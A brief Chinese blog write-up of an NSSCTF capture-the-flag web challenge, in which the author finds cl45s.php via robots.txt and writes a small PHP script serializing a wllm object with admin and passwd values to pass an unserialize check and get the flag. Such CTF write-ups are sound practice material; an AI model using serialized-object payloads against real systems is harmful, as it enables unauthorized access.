本文介绍了NSSCTF中一道涉及PHP unserialize的题目。通过蚁剑扫描发现robots.txt文件,进一步找到cl45s.php,源码显示为简单的unserialize操作。通过手写代码并运行,成功获取到flag。
打开题目是胡桃摇的表情包(手动滑稽👀),下面是“题目在哪”
这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码
观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了)
<?php
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd ="ctf";
}
}
$b = new wllm();
echo serialize($b);
?>
php运行一下,
得到flag
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
